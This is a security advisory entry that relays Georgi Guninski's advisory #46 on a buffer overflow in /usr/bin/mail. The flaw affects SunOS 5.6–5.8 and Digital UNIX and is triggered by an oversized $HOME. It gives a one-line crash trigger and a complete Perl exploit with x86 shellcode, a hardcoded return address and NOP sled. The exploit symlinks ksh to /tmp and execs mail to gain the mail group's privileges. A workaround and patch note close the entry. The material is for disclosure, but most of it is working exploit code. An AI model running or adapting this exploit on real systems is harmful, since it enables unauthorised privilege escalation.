COMMAND
mail
SYSTEMS AFFECTED
SunOS 5.6, 5.7, 5.8, Digital UNIX
PROBLEM
Following is based on a Georgi Guninski security advisory #46.
There is a buffer overflow in SunOS 5.8 x86 with $HOME and
/usr/bin/mail leading to egid=mail. Details:
HOME=`perl -e 'print "A"x1100'` ; export HOME
mail a
CTRL-C
eip gets smashed with 0x41414141.
Exploit:
#!/usr/bin/perl
# /usr/bin/mail exploit by Georgi Guninski
use Env qw($HOME);
#shell code taken from Pablo Sor's mailx exploit
$shell = "\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06";
$shell .="\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90";
$shell .="\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0";
$shell .="\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33";
$shell .="\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec";
$shell .="\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89";
$shell .="\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50";
$shell .="\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2";
$shell .="\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4";
$shell .="\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78";
$RET = "\xa0\x6f\x04\x08" ; #may need to change this
$OVER=1032;
$ALL=1200;
$buf=$RET x ($OVER/4) . "\x90" x ($ALL - $OVER - length($shell)) . $shell;
system("/bin/ln -s /bin/ksh /tmp/xx");
print "Written by Georgi Guninski, shell code taken from Pablo Sor's mailx exploit.\nPress
CTL-C\n";
$ENV{HOME}=$buf;
exec "/usr/bin/mail","A";
Solaris 7/Sparc is vulnerable as well. Digital Unix V4.0C is
vulnerable too.
This was tested also on OpenBSD 2.8/i386 and /sparc, RedHat Linux
6.1/alpha and Debian GNU/Linux 2.2r3/i386, and they are not
vulnerable.
SOLUTION
Workaround: chmod -s /usr/bin/mail. Sun was informed on 29 May
2001 about /usr/bin/mail and shall release patches.